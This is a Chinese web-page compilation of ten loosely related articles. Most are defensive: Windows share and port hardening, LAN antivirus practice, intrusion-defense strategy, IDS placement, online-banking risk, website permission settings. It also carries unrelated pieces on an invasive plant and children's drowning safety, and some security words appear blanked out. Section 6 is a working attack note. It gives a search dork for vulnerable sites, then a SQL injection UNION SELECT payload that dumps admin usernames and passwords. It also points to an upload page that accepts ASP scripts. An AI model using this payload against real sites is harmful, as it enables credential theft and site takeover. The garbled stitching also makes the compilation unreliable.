防入侵与防病毒:20招打造安全个人电脑

下面是小编整理的防入侵与防病毒:20招打造安全个人电脑，本文共10篇，欢迎您能喜欢，也请多多分享。本文原稿由网友“不要昏迷”提供。

篇1：防入侵与防病毒:20招打造安全个人电脑

大家好，我是argent_wolf，一个网络爱好者，现在网络安全方面的文章的确很多，不过针对家用电脑这方面好的文章不是太多。所以决定自己为咱们普通网民们写一个尽量全面的安全指南。保证我们快乐的上网，自由的上网。

由于现在家用电脑所使用的操作系统多数为WinXP和Winpro(建议还在使用98的朋友换换系统，连微软都放弃了的系统你还用它干嘛？)所以后面我将主要讲一下基于这两个操作系统的安全防范。

个人电脑常见的被入侵方式

谈到个人上网时的安全，还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种：

(1)被他人 ；

(2)系统被木马攻击；

(3)浏览网页时被恶意的javascrpit程序攻击；

(4)QQ被攻击或泄漏信息；

(5)病毒感染；

(6)系统存在漏洞使他人攻击自己。

(7) 的恶意攻击。

下面我们就来看看通过什么样的手段来更有效的防范攻击。

1.察看本地共享资源

运行CMD输入netshare，如果看到有异常的共享，那么应该关闭。但是有时你关闭共享下次开机的时候又出现了，那么你应该考虑一下，你的机器是否已经被 所控制了，或者中了病毒。

2.删除共享(每次输入一个）

netshareadmin$/delete

netsharec$/delete

netshared$/delete（如果有e，f，……可以继续删除）

3.删除ipc$空连接

在运行内输入regedit，在注册表中找到HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA项里数值名称RestrictAnonymous的数值数据由0改为1。

4.关闭自己的139端口，ipc和RPC漏洞存在于此。

关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。

5．防止rpc漏洞

打开管理工具??服务??找到RPC(RemoteProcedureCall(RPC)Locator)服务??将故障恢复中的第一次失败，第二次失败，后续失败，都设置为不操作，

XPSP2和2000prosp4，均不存在该漏洞。

6．445端口的关闭

修改注册表，添加一个键值

HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\NetBT\\Parameters在右面的窗口建立一个SMBDeviceEnabled为REG_DWORD类型键值为0这样就ok了

7．3389的关闭

XP：我的电脑上点右键选属性--远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

Win2000server开始--程序--管理工具--服务里找到TerminalServices服务项，选中属性选项将启动类型改成手动，并停止该服务。（该方法在XP同样适用）

使用2000pro的朋友注意，网络上有很多文章说在Win2000pro开始--设置--控制面板--管理工具--服务里找到TerminalServices服务项，选中属性选项将启动类型改成手动，并停止该服务，可以关闭3389，其实在2000pro中根本不存在TerminalServices。

8．4899的防范

网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口，由于这些控制软件功能强大，所以经常被 用来控制自己的肉鸡，而且这类软件一般不会被杀毒软件查杀，比后门还要安全。

4899不象3389那样，是系统自带的服务。需要自己安装，而且需要将服务端上传到入侵的电脑并运行服务，才能达到控制的目的。

所以只要你的电脑做了基本的安全配置， 是很难通过4899来控制你的。

9、禁用服务

打开控制面板，进入管理工具??服务，关闭以下服务

1.Alerter[通知选定的用户和计算机管理警报]

2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]

3.DistributedFileSystem[将分散的文件共享合并成一个逻辑名称，共享出去，关闭后远程计算机无法访问共享

4.DistributedLinkTrackingServer[适用局域网分布式链接?

篇2：抵御局域网病毒入侵保障个人电脑安全

个人用户感染病毒后，使用单机版杀毒软件即可清除;然而企业的网络中，一台机器一旦感染病毒，它便会自动复制、发送并采用各种手段不停交叉感染局域网内的其他用户， 计算机病毒形式及传播途径日趋多样化，因此，大型企业网络系统的防病毒工作已不再像单台计算机病毒的检测及清除那样简单，而需要建立多层次的、立体的病毒防护体系，而且要具备完善的管理系统来设置和维护对病毒的防护策略，抵御局域网病毒入侵保障个人电脑安全。

一个企业网的防病毒体系是建立在每个局域网的防病毒系统上的，应该根据每个局域网的防病毒要求，建立局域网防病毒控制系统，分别设置有针对性的防病毒策略。

1、增加安全意识

杜绝病毒，主观能动性起到很重要的作用。病毒的蔓延，经常是由于企业内部员工对病毒的传播方式不够了解，病毒传播的渠道有很多种，可通过网络、物理介质等，

查杀病毒，首先要知道病毒到底是什么，它的危害是怎么样的，知道了病毒危害性，提高了安全意识，杜绝毒瘤的战役就已经成功了一半。平时，企业要从加强安全意识着手，对日常工作中隐藏的病毒危害增加警觉性，如安装一种大众认可的网络版杀毒软件，定时更新病毒定义，对来历不明的文件运行前进行查杀，每周查杀一次病毒，减少共享文件夹的数量，文件共享的时候尽量控制权限和增加密码等，都可以很好地防止病毒在网络中的传播。

2、小心邮件

随着网络的普及，电子信箱成了人们工作中不可缺少的一种媒介。它方便快捷在提高了人们的工作效率的同时，也无意之中成为了病毒的帮凶。有数据显示，如今有超过90%的病毒通过邮件进行传播。

尽管这些病毒的传播原理很简单，但这块决非仅仅是技术问题，还应该教育用户和企业，让它们采取适当的措施。只要用户随时小心警惕，不要打开值得怀疑的邮件，就可把病毒拒绝在外。

3、挑选网络版杀毒软件

选择一个功力高深的网络版病毒杀手就至关重要了，如瑞星08网络版杀毒软件。一般而言，查杀是否彻底，界面是否友好、方便，能否集中管理是决定一个网络杀毒软件的三大要素。

篇3：打造个人电脑安全终极防线禁止默认共享WEB安全

声明:

本文并非本人所著,是本人一个朋友整理实践而来的.适用于Windows 以上版本.本文所涉及到的实验在Windwos 下通过

----------------------------------------

【一、禁止默认共享 】

1.先察看本地共享资源

运行-cmd-输入net share

2.删除共享(每次输入一个）

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3.删除ipc$空连接

在运行内输入regedit

在注册表中找到  HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA

项里数值名称RestrictAnonymous的数值数据由0改为1.

4.关闭自己的139端口,ipc和RPC漏洞存在于此.

关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”

属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关

闭了139端口,禁止RPC漏洞.

----------------------------------------

篇4：那些年防入侵的二三事WEB安全

企业越大，可能被入侵的途径越多，

各种漏洞，开发安全流程的和安全规范的缺失，基础安全配置检查的疏忽，敏感信息泄露，各种细节的问题都有可能使千里之堤溃于蚁穴。

如何在如此多的繁杂的安全问题中如何归根i源，找到一个根本上的解决思路，这些年每每看到入侵事件我都会反思这个安全体系到底出了什么问题。

在几年之前我在考虑防入侵的时候更多的是考虑如何直接防御攻击。

比如在边界上的ACL网络隔离，部署堡垒机控制登陆权限。

禁止反连，让 无法反弹SHELL。

比如针对WEB应用去直接上WAF防御各种web攻击。

通过SDL去解决代码中的各种弱点，包括漏洞检测，白盒检测和各种代码REVIEW。

后来我觉得还不够，因为不是每种攻击我们都一定能够防御的，那些看似毫无破绽的防御产品，并不会直接被 挑战，入侵者不喜欢硬碰硬，他只会找软柿子去捏，你的一个弱点可能让你全盘皆输。

为了进一步占领这场战争的制高点：

我尝试是做一些后门检测的产品。

或者做一些主机入侵行为检测的产品。

尝试去分析访问日志监控一些可能的攻击请求。

又或者在 通往成功的路上继续设置各种障碍，SQL注入检测,拖库检测等等。

那这样真的够了吗，这场战争我就会赢吗，面对APT，邮件钓鱼，内外结合的各种风险，发现我们仍然处于一个敌我不分的乱世之中，我发现这样依然无法彻底解决问题。

现在我又在想不断的梳理系统权限，控制系统权限，收集各种系统日志，做各种业务异常风险监测模型，

尝试实时的去在LOGIN点检测各种帐号的异常行为。

去记录每个用户的操作，去审计操作的合法性。

去申请预算，做XXSRC发动群众的力量来给自己找漏洞。

还发展到要去我们以为安全的各种内部系统做深度的安全检查。

还要去做敏感信息防泄露，防撞库。

我们越来越往下做，发现防入侵真的是一个无底之洞，那些安全永远只是相对的。

到今天我归纳我所做的防入侵其实是有三个步骤。

第一阶段: 防御

第二阶段: 检测

第三阶段: 审计

有一天我突然想算算我做的这些事情的价值几何，我算出来发现。

防御阶段 -》 解决了70%的入侵问题

检测阶段 -》 解决了剩下20%的入侵问题

审计阶段 -》 解决了剩下的9%的入侵问题

还有1%是你永远也无法解决并预料到的，或许XXSRC能帮到你。

其实就是一个倒金字塔。

说到这里，似乎事情并没有完全搞定，为什么没有搞定，这个问题其实就像博弈一样，没有永远的赢家也没有永远的输家，作为一个安全工作者，如果忘了自己是一名刀尖上的舞者，而把自己当成一名太平侍卫，那么其实坏事也就将近了。

虽然我们默默无闻，但我们弥足珍贵，敬所有白帽子。

​

篇5：外来物种葛藤的入侵与防控

外来物种葛藤的入侵与防控

阐述了我国葛藤的'入侵现状,并提出其控制对策,以期为外来物种入侵防控奠定基础.

作 者：陈雁 肖杨  作者单位：中南民族大学生命科学学院,湖北武汉,430074 刊 名：现代农业科技 英文刊名：XIANDAI NONGYE KEJI 年，卷(期)： “”(22) 分类号：X176 Q16 关键词：外来物种   葛藤   生物入侵  

篇6：一次枫叶防注入程序漏洞手工入侵脚本安全

该程序采用枫叶通用防注入1.0asp版，此程序pro_show.asp处存在cookies注入或者变型注入漏洞，到目前为止还是有很多网站任然没有修复这个漏洞，也有些网站简单采取了防注入（据说可以绕过哦），

百度关键字：inurl:pro_show.asp?showid=

注入前可以先判断一下字段数：www.xxx.com/pro_show.asp?showid=17 order by 28

注入语句：www.xxx.com/pro_show.asp?showid=17 and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin

字段数自己判断，我试了2个网站都是28，至于密码有明文也有md5加密的，后台自找，

后台上传地址：admin/inc/upfile.htm 可直接上传asp文件

​

篇7：安防及入侵检测・什么是IDS与防火墙对比

安防及入侵检测・什么是IDS与防火墙对比

不同于防火墙，IDS入侵检测系统是一个监听设备，没有跨接在任何链路上，无须网络流量流经它便可以工作。因此，对IDS的部署，唯一的要求是：IDS应当挂接在所有所关注流量都必须流经的链路上。在这里，“所关注流量”指的是来自高危网络区域的访问流量和需要进行统计、监视的网络报文。在如今的.网络拓扑中，已经很难找到以前的HUB式的共享介质冲突域的网络，绝大部分的网络区域都已经全面升级到交换式的网络结构。因此，IDS在交换式网络中的位置一般选择在：

（1）尽可能靠近攻击源

（2）尽可能靠近受保护资源

这些位置通常是：

・服务器区域的交换机上

・Internet接入路由器之后的第一台交换机上

・重点保护网段的局域网交换机上

篇8：网上银行的安全与风险防控

自进入21世纪以来，网上银行的用户也象互联网一样成几何级数增长，全国网上银行交易金额达60万亿元人民币，网上银行占银行全部业务的比重越来越高，交易替代率也在飞速增长。据悉，工商银行和招商银行网银的交易替代率均已超过25%，也就是说，有1/4的银行支付业务是通过网上完成的。网上银行已经进入寻常百姓人家和普通企业。网上银行正在成为各家商业银行拓宽服务领域、实现业务增长、调整经营战略的重要手段；是维系现有老客户，发展新客户的重要工具；是服务创新和竞争的利器。

不论是商业银行还是最终用户，都在尽享网上银行优势和便捷的同时，又感受到了网上银行安全问题的困惑。网上银行到底是否安全？成了使用者、IT及业务专家们争论的焦点。在各种媒体上也一直是一个争论不休的话题，国内也出现过几起利用木马程序等方式盗取用户名和密码，进而盗取用户的资金，甚至出现用户与银行对簿公堂的情况。各家商业银行也纷纷联合起来发表声明，举办宣传活动，培训、教育和提醒广大客户安全使用网上银行。如由中国金融认证中心（China Finance Certification 张连泽ity，简称CFCA）牵头联合几乎所有商业银行发起了“放心安全用网银联合宣传年”活动，据调查，宣传年活动取得了良好的宣传效果，受到了商业银行、广大民众的欢迎和认可。

网上银行的安全问题主要涉及系统安全、使用安全和数据通讯安全三个方面。首先，系统安全不容忽视，主要包括软硬件系统、应用系统和系统运行的安全。从商业银行角度，各家银行不惜投入重大资金纷纷引进先进的计算机软硬件，学习发达国家的经验，引进先进技术和系统，选择软件开发商也都是国内外最好的，力图确保系统的稳定性和先进性，最大限度地确保网上银行软硬件系统的安全。系统运行又包括系统功能、反应能力、稳定性和运行机制等，这些同样影响着网上银行的安全，是网上银行安全问题的关键环节。

其次，是使用安全问题，这个问题包括银行系统的生产运行安全和客户使用安全两个方面。银行的机房（包括网上银行的系统运行）往往被视为银行的重要核心地方，安全措施和规章制度都非常健全，并严格地落实到实处。风险控制和管理部门的常规监督检查也是作为网络运行安全的一个重要环节；如网上银行是否有健全的各项规章制度？是否得到了有效执行？等。最后，另外一个重要的问题就是客户使用网银的安全意识和习惯。这也往往是造成资金被盗取或骗取的主要风险点，通过近一段时间发生的案件，可以看出培养和营造广大民众使用网上银行的环境，培训广大民众正确使用网上银行服务的任务，已是时不我待，迫在眉睫。教会人们分清真假网站，避免 和假网站套取用户密码和交易密码。建议人们使用证书进行交易时刻保管好自己的证书。数据通讯安全也是目前威胁网上银行安全的一个重要因素。国内外也出现过网络 截获客户通讯数据，安装木马程序等，复制和盗取客户标识和密码，转移客户在银行的资金，造成客户和银行资金的损失。

网上银行业务的运行风险也是存在的。一是支付风险，也可以叫作流动性风险，

如不能预知客户的随机对外付款、对外转账和汇款等网上支付指令，付款频率和金额均不容易掌控，很容易造成实际头寸不足而形成的风险，即容易造成央行结算账户透支的风险，进而被罚款甚至停止清算业务。这样商业银行可以在和客户签定服务协议时，对网上支付单笔限额和当日总额进行限制说明或约定。某种程度上，可以降低商业银行的支付风险。二是安全认证风险。即安全认证方式和认证机制方面存在的风险。认证方式一种是商业银行自建CA（Certification 张连泽ity）系统，要求网银客户使用。另一种是第三方认证，即网银客户使用专门从事安全认证机构发放的证书。在204月1日实施的电子签名法中明确推荐使用第三方证书，引入第三方认证机制。这样，就排除了商业银行即当运动员又当裁判员时可能存在的各种风险。三是运行中的操作和管理风险。即商业银行内部运行管理时可能存在的风险，如系统操作、管理没有实行复核审核分权控制机制，或者有制度没有严格执行等。要规避这种风险，就必须健全运行管理制度，规范操作，严格执行分级分权控制审核机制。

网上银行的安全是相对的，而存在的风险才是绝对的，关键是如何认识网上银行的安全与风险。一、不能一味地拒绝和回避网上银行，拒绝网上银行势必造成客户和商业银行资金运营成本的提高，降低效率，甚至错失良机。如商业银行网点营业时间有限，没有网上银行跨越时空的优势、也没有客户瞬间操作的便利，更缺少个性化的网络产品服务。二、又不能麻痹大意，认为网上银行是绝对安全没有风险，放松警惕，不论何种场合都使用网上银行进行交易，认为只要使用证书就能保护用户的安全，这种想法是错误的。不注意保管证书，使用网上银行很容易被人复制和截获。三、树立安全意识，正确提供和使用网上银行服务，是明智之举。银行提升网络系统的硬件系统安全级别和完善应用的系统结构，规范各类规章制度，加强风险控制和管理是必不可少的；网上银行的使用者选择安全的使用环境，申请设置适当必要的网上银行服务；涉及交易服务尤其是对外的付款等功能，最好使用证书作为安全的保护神，对网上银行保驾护航也是安全的选择。另外，经常更新密码，避免使用生日、门牌号、电话号码等明显容易被人获知猜到的信息。

对广大民众使用网上银行的安全教育和引导已迫在眉睫。据权威认证机构中国金融认证中心（简称CFCA）最新调查结果显示：目前有19.4%的家庭正在使用网上银行服务，有35.7%的家庭表示在未来1年内可能使用，而44.8%的企业回答在未来1年内也没有使用网上银行的打算。相应地，现有用户、潜在用户和不可能用户的比例分别是：19.4%、35.7%和44.8%。一方面说明网上银行的市场前景较好，说明社会环境正在逐步完善，进而可能会迅速走向成熟的发展期。另一侧面说明用户对网上银行业务还存在隐忧。有85.1%的人表示选择网上银行的主要考虑因素是“操作方便性”。其次是“安全性”。 调查结果还表明，55.7%的用户最看重的是“安全保镖”功能，即保证网上信息不被窃取和篡改。其次是服务操作的方便性和实现的功能，用户对两个方面要求较高。

总之，网上银行除了要求商业银行保证系统运行安全和数据通讯安全外，用户掌握正确的使用方法和注意事项也是至关重要的。尤其是随着电子商务的飞速发展，现金交易、现金结算正在逐步减少，取而代之的是网上支付和网上结算，网上银行的便捷性、安全性等优势正在突现。正确使用网上银行，树立安全意识，防患于未然，即可尽享网上银行的便捷、安全与快乐。

篇9：小学生游泳与防溺水安全知识

小学生游泳与防溺水安全知识

一、小学生游泳“十六忌”。

1.忌饭前饭后游泳。空腹游泳会影响食欲和消化功能，也会在游泳中发生头昏乏力等意外情况;饱腹游泳也会影响消化功能，还会产生胃痉挛，甚至呕吐、腹痛现象。

2.忌剧烈运动后游泳。剧烈运动后马上游泳，会使心脏负担加重;体温急剧下降，会使抵抗力减弱，引起感冒、咽喉炎等。

3.忌月经期游泳。月经期间游泳，病菌易进入子宫、输卵管等处，引起感染，导致月经不调、经量过多、经期延长。

4.忌在不熟悉的水域游泳。凡水域周围和水下情况复杂的都不宜下水游泳，以免发生意外。

5.忌长时间曝晒游泳。长时间曝晒会产生晒斑，或引起急性皮炎。为防止晒斑的发生，上岸后最好用伞遮阳，或到有树荫的地方休息，或披上浴巾，或在身体裸露处涂防晒霜。

6.忌不做准备活动即游泳。水温通常比体温低，下水前必须做准备活动，否则易导致身体抽筋等不适。

7.忌游泳后马上进食。游泳后宜休息片刻再进食，否则会突然增加胃肠负担，久之容易引起胃肠道疾病。

8.忌游泳时间过久。皮肤对寒冷刺激一般有三个反应期：第一期：入水后，受冷的刺激，皮肤血管收缩，肤色苍白;第二期：在水中停留一定时间后，体表血流扩张，皮肤由苍白转呈浅红色，肤体由冷转暖;第三期：停留过久，皮肤出现鸡皮疙瘩和寒颤现象：这是夏游的禁忌期，应及时出水。总之，游泳持续时间一般不应超过1.5-2小时。

9.忌有癫痫史游泳。患有癫痫病者，无论是大发作型还是小发作型，在发作时有一瞬间意识失控，如果在游泳中突然诱发，就难免遭遇“灭顶之灾”。

10.忌高血压患者游泳。特别是顽固性的高血压，药物难以控制，游泳有诱发中风的潜在危险，应绝对避免。

11.忌心脏病患者游泳。如先天性心脏病、严重冠心病、较严重心律失常等患者，对游泳应“敬而远之”。

12.忌中耳炎患者游泳。不论是慢性还是急性中耳炎，因水进入发炎的中耳，等于“雪上加霜”，使病情加重，甚至可能导致颅内感染等。

13.忌患急性眼结膜炎游泳。该病病毒，特别是在游泳池里传染速度之快、范围之广令人吃惊。在该病流行季节，即使是健康人，也应避免到游泳池内游泳。

14.忌某些皮肤病游泳。如各个类型的.癣，过敏性的皮肤病等，不仅诱发荨麻疹、接触皮炎，而且易加重病情。

15.忌酒后游泳。酒后游泳体内储备的葡萄糖大量消耗会出现低血糖。另外，酒精能抑制肝脏正常生理功能，妨碍体内葡萄糖转化及储备，从而发生意外。

16.忌忽视泳后卫生。泳后，应立即用软质干巾擦去身上水垢，滴上氯霉或硼酸眼药水，擤出鼻腔分泌物。如若耳部进水，可采用措施将水排出。之后，再做几节放松体操及肢体按摩，或在日光下小憩15-20分钟，以避免肌群僵化和疲劳。

二、预防溺水事故发生

1.不要独自一人外出游泳，更不要到不知水情或比较危险且宜发生溺水伤亡事故的地方去游泳。选择好的游泳场所，对场所的环境，如水库、浴场是否卫生，水下是否平坦，有无暗礁、暗流、杂草，水域的深浅等情况要了解清楚。

除江、河、湖、海、溪边之外，水池、排污渠、窨井、采石坑(洞)、粪坑、蓄水池、鱼塘(池塘、虾池)等都可能因学生玩耍或游泳而发生溺水事故。

2.必须在家长、老师或熟悉水性的人的带领下去游泳，以便互相照顾。

3.要清楚自己的身体健康状况，平时四肢就容易抽筋者不宜游泳或不要到深水区游泳。要做好下水前的准备，先活动活动身体，如水温太低应先在浅水处用水淋洗身体，待适应水温后再下水游泳;镶有假牙的同学，应将假牙取下，以防呛水时假牙落入食管或气管。

4.对自己的水性要有自知之明，下水后不能逞能，不要贸然跳水和潜泳，更不能互相打闹，以免喝水和溺水。不要在急流和漩涡处游泳，更不要酒后游泳。

5.在游泳中如果突然觉得身体不舒服，如眩晕、恶心、心慌、气短等，要立即上岸休息或呼救。

6.学生洗澡过程中若发生漏电或煤气中毒事故，也可能因失去意识而倒在浴缸、澡盆、马桶中而发生溺水事故。

三、如何预防游泳时下肢抽筋

1.游泳前一定要做好热身运动。

2.游泳前应考虑身体状况，如果太饱、太饿或过度疲劳时，不要游泳。

3.游泳前先在四肢淋些水再下水，不要立即下水。

4.游泳时如胸痛，可用力压胸口，等到稍好时再上岸。

5.腹部疼痛时，应上岸，最好喝一些热的饮料或热汤，以保持身体温暖。

四、游泳时如何自救

游泳中常会遭遇到的意外是抽筋、疲乏、漩涡、急浪等，这时，要沉着冷静，按照一定的方法进行自我救护，同时，发出呼救信号。

1.不熟悉水性者自救方法

除呼救外，取仰卧位，头部向后，使鼻部可露出水面呼吸。呼气要浅，吸气要深。因为深吸气时，人体比重降到比水略轻，可浮出水面。此时，千万不要将手臂上举乱扑动，而使身体下沉更快。

2.水中抽筋自救法

抽筋的主要部位是小腿和大腿，有时手指、脚趾及胃部等部位也会抽筋。游泳时发生抽筋，千万不要惊慌，一定要保持镇静，停止游动，先吸一口气，仰面浮于水面，并根据不同部位采取不同方法进行自救。

(1)若因水温过低而疲劳产生小腿抽筋，则可使身体成仰卧姿势。用手握住抽筋腿的脚趾，用力向上拉，使抽筋腿伸直，并用另一腿踩水，另一手划水，帮助身体上浮， 这样连续多次即可恢复正常，

上岸后用中、食指尖掐承山穴或委中穴，进行按摩。

(2)若是大腿抽筋，可采用拉长抽筋肌肉的办法解决。

(3)两手抽筋时，应迅速握紧拳头，再用力伸直，反复多次，直至复原。如单手抽筋，除做上述动作外，可按摩合谷穴、内关穴、外关穴。

(4)上腹部肌肉抽筋，可掐中脘穴(在脐上四寸)，配合掐足三里穴，还可仰卧水里，把双腿向腹壁弯收，再行伸直，重复几次。

(5)抽过筋后，改用别种游泳姿势游回岸边。如果不得不仍用同一游泳姿势时，就要提防再次抽筋。

3.水草缠身自救法

(1)首先要镇静，切不可踩水或手脚乱动，否则就会使肢体被缠得更难解脱，或在淤泥中越陷越深。

(2)用仰泳方式(两腿伸直、用手掌倒划水)顺原路慢慢退回。或平卧水面，使两腿分开，用手解脱。

(3)如随身携带小刀，可把水草割断，不然试试把水草踢开，或像脱袜那样把水草从手脚上捋下来。自己无法摆脱时，应及时呼救。

(4)摆脱水草后，轻轻踢腿而游，并尽快离开水草丛生的地方。

4.身陷漩涡自救法

(1)有漩涡的地方，一般水面常有垃圾、树叶杂物在漩涡处打转，只要注意就可早发现，应尽量避免接近。

(2)如果已经接近，切勿踩水，应立刻平卧水面，沿着漩涡边，用爬泳快速地游过。因为漩涡边缘处吸引力较弱，不容易卷入面积较大的物体，所以身体必须平卧水面，切不可直立踩水或潜入水中。

5.疲劳过度自救法

(1)觉得寒冷或疲劳，应马上游回岸边。如果离岸甚远，或过度疲乏而不能立即回岸，就仰浮在水上以保留力气。

(2)举起一只手，放松身体，让对方拯救。不要紧抱着拯救者不放。

(3)如果没有人来，就继续浮在水上，等到体力恢复后再游回岸边。

6.出水后正确抢救

溺水是常见的意外事故。遇到溺水者，不提倡未成年人贸然下水施救。出水后的抢救方法有以下几种。

(1)将溺水者抬出水面后，应立即清除其口、鼻腔内的水、泥及污物，用纱布(手帕)裹着手指将溺水者舌头拉出口外，解开衣扣、领口，以保持呼吸道通畅，然后抱起溺水者的腰腹部，使其背朝上、头下垂进行倒水。或者抱起溺水者双腿，将其腹部放在急救者肩上，快步奔跑使积水倒出。或急救者取半跪位，将溺水者的腹部放在急救者腿上，使其头部下垂，并用手平压背部进行倒水。在农村，亦可将溺水者俯卧横在牛背上，头脚下悬，赶牛行走，这样又控水、又起到人工呼吸作用。

(2)呼吸停止者应立即进行人工呼吸，一般以口对口吹气为最佳。急救者位于溺水者一侧，托起溺水者下颌，捏住溺水者鼻孔，深吸一口气后，往溺水者嘴里缓缓吹气，待其胸廓稍有抬起时，放松其鼻孔，并用一手压其胸部以助呼气。反复并有节律地(每分钟吹16～20次)进行，直至恢复呼吸为止。

(3)心跳停止者应先进行胸外心脏按摩。让溺水者仰卧，背部垫一块硬板，头低稍后仰，急救者位于溺水者一侧，面对溺水者，右手掌平放在其胸骨下段，左手放在右手背上，借急救者身体重量缓缓用力，不能用力太猛，以防骨折，将胸骨压下4厘米左右，然后松手腕(手不离开胸骨)使胸骨复原，反复有节律地(每分钟60～80次)进行，直到心跳恢复为止。

五、家长带孩子游泳应该注意些什么?

(1)教孩子不要用鼻子吸气。游泳时用鼻子吸气，最容易引起呛水。下水前，家长要向孩子讲清楚：如果呛了水，首先要张大嘴，做深呼吸，哪怕喝上几口水，也一定要张大嘴，而不能用鼻子喘气。

(2)告诉孩子不要在游泳池四周打闹。

(3)防止孩子在游泳池跳水。

(4)防止孩子腿抽筋。游泳前，头、颈、双肩、双臂、腰腿、手、脚的关节都要活动开。有时家长还可以先在孩子的四肢泼点水，让孩子逐渐适应水温，然后再下水游泳。还可以预先喝点淡盐水。

(5)不让孩子离开家长的视线。孩子游泳时，家长时时将视线放在孩子身上，以便在危险时立即采取行动。

(6)孩子游泳时，如果耳朵进水，可采用如下方法将耳朵里的水排出。

单足跳跃法：将头歪向耳朵进水的一侧，用力拉住耳垂，用同侧腿单脚跳。

活动外耳道法：连续用手心对准耳道，用手把耳朵堵严压紧，左耳进水就把头歪向左边，右耳进水就把头歪向右边，然后迅速将手挪开，水就会被吸出来;或用手指牵拉耳廓，或反复地做张口动作，活动颞颌关节，均可使外耳道皮肤不断上下左右活动或改变水屏障稳定性和压力的平稳，使水向外从外耳道流出。

外耳道清理法：用干净的细棉签轻轻探入外耳道，一旦接触到水屏障时即可把水吸出。

(7)防止孩子恶心呕吐。孩子游泳时由于鼻子呛水、喝进水、疲乏劳累、情绪紧张，有的会造成一时性的反胃，应及时上岸，用手指压中脘、内关穴或服几粒人丹。

(8)不到江河湖海和水库游泳。尽量不让孩子到江、河、湖、海及水库里游泳，这些地方的水看似平静，可是由于水下暗藏漩涡，一入水中便有可能被漩涡卷走。如果要去这些地方，务必要有家长相伴，并带上浮漂等安全装备。在海中游泳，最好沿着海岸线平行游，游泳技术不佳和体力不充沛者，不要涉水至深处。

六、面对洪水时如何避免溺水?

1.发洪水时应注意往高处逃;

2.尽力躲避大浪;

3.尽量抓住浮托物;

4.挥动鲜艳衣物呼救;

相关文章推荐：

1.中学生安全常识

2.夏季出游必备常识

3.幼儿安全教育常识

4.学生防溺水安全知识

5.防溺水安全知识大全

6.小学生防溺水安全知识

7.关于中学生寒假安全常识知多少

8.小学生安全知识 :防溺水安全知识

篇10：设网站文件目录与数据库权限拒绝安全入侵

网站目录权限的设置方法

大多数网站都是采用程序搭建，对于系统管理的目录，可以将其设置为可读也可执行脚本，但不可写入的权限;但是对于放置网页静态文件的目录，以及放置图片文件、模板文件的目录，就可以将其设置为可读写但不可执行的系统权限，在权限分配明确之后，即使系统被入侵，也只能浏览而无法对文件进行直接的操作。

对于能够执行脚本的文件，最好设置只能读而不能写的权限，而需要写入的文件则将其设置为不能执行脚本，目录权限这样配置下来，网站系统的安全性会大大提高。

数据库权限也要仔细设置

对于网站来说，数据库可以说是站点的核心，所有网站的内容都存储在数据库中。所以说数据库安全也是需要注意的地方。对于MySQL数据库来说，最好不要对网站直接使用root管理用户的权限，而要专门为每个站点开通一个数据库账号，而且将账户的权限设置仅限于操作当前数据库目录，并且对这些单独的MYSQL账号去掉file和EXECUTE的执行权限，这样一来，即使数据库被SQL注入，也只能到数据库一级，而无法拿到整个数据库服务器的权限，

这样一来，只要经常对网站的数据库进行备份，就很少会出现数据库被入侵的情况。

另外需要注意的是，由于很多建站系统并没有使用数据库的存储过程，因此最好禁用FILE、EXECUTE 等执行存储过程或文件操作的权限。

小提示：对于Access的数据库来说，可以将数据库的存放位置进行修改，最好是较为隐蔽的目录，这样会避免数据库文件被恶意探测下载。另外，一些程序也支持修改后缀，比如可以将。mdb的数据库文件修改为。asa等后缀名，同样可以有效地保护数据库安全。

删除不需要的文件

很多内容管理系统中，都会在空间中存在很多以后并不需要的文件，最普遍的可能就属于系统安装文件了，这类文件通常被命名为install.php或者install.asp，如果你的空间中存在类似的文件，现在就赶快删除吧。

另外，一些CMS也会存在很多功能，如问答系统等等，但是往往这些功能在网站中都不会用到，这时候就建议将这些功能的目录删除，或者仅保留Html静态页面，然后将目录设置为可读写但不可执行的权限。

防安全月活动总结

施工防台风安全通知

学校防踩踏安全制度

防电安全心得体会精选

防雷防电的安全知识

防入侵与防病毒:20招打造安全个人电脑.doc

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档